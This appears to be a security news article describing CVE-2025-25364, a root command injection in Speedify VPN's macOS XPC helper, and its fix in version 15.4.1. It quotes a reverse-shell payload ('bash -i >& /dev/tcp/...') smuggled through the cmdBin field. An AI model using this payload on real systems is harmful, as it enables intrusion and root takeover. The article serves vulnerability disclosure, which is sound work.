macOS
sysops

A significant security vulnerability, tracked as CVE-2025-25364, was discovered in Speedify VPN’s macOS application, exposing users to local privilege escalation and full system compromise. 

The flaw, uncovered by SecureLayer7, resides in the privileged helper tool me.connectify.SMJobBlessHelper, which is responsible for executing system-level operations with root privileges for the Speedify VPN client.

The vulnerability stemmed from improper input validation in the XPC (Cross-Process Communication) interface of the helper tool.

Specifically, two user-controlled fields—cmdPath and cmdBin—within incoming XPC messages were used directly to construct command-line strings without adequate sanitization. 

This oversight enabled a command injection vulnerability, allowing any local attacker to craft a malicious XPC message and inject arbitrary shell commands that would be executed as root.

The attack chain involved several functions:

XPC_Connection_Handler_block_invoke: Entry point for XPC messages. It checked for a dictionary-type message and invoked _handleLaunchSpeedifyMsg if the “request” field was “runSpeedify”. No validation was performed on the contents of cmdPath or cmdBin.

_handleLaunchSpeedifyMsg: Retrieved cmdPath and cmdBin from the XPC dictionary and passed them, unchecked, to the next function.

_RunSystemCmd: Constructed and executed a command string using asprintf, embedding the user-supplied cmdPath and cmdBin directly. The critical line was:

This command string was then executed using system(), making it trivial for an attacker to inject additional shell commands.

Risk FactorsDetailsAffected ProductsSpeedify VPN for macOS (up to version 15.0.0)ImpactLocal privilege escalation; arbitrary command execution as root.Exploit PrerequisitesLocal access; ability to send crafted XPC messages to the helper toolCVSS 3.1 Score9.8 (Critical)

Proof-of-Concept Exploit

A proof-of-concept (PoC) exploit demonstrated the issue by sending a crafted XPC message to the vulnerable service. 

By setting cmdBin to a payload such as “; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo “, an attacker could spawn a reverse shell with root privileges. 

The exploit code, written in Objective-C, connected to the me.connectify.SMJobBlessHelper XPC service and delivered the malicious payload, resulting in immediate root-level access.

Because the helper tool ran as a root-level daemon (/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper), successful exploitation meant an attacker could:

Read, modify, or delete sensitive system files.

Install persistent malware or backdoors.

Gain complete control over the affected macOS device.

This vulnerability, therefore, posed a critical risk to any system running vulnerable versions of Speedify VPN (prior to 15.4.1).

Speedify VPN addressed the vulnerability in version 15.4.1, which included a complete rewrite of the helper tool. 

The new version eliminated the insecure XPC handling and implemented proper input validation, closing the command injection vector. 

Users are strongly urged to update to the latest version to mitigate the risk of exploitation.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy

Related Posts

A critical vulnerability has been identified in the TeamViewer Client for macOS. If exploited, this flaw could allow attackers to…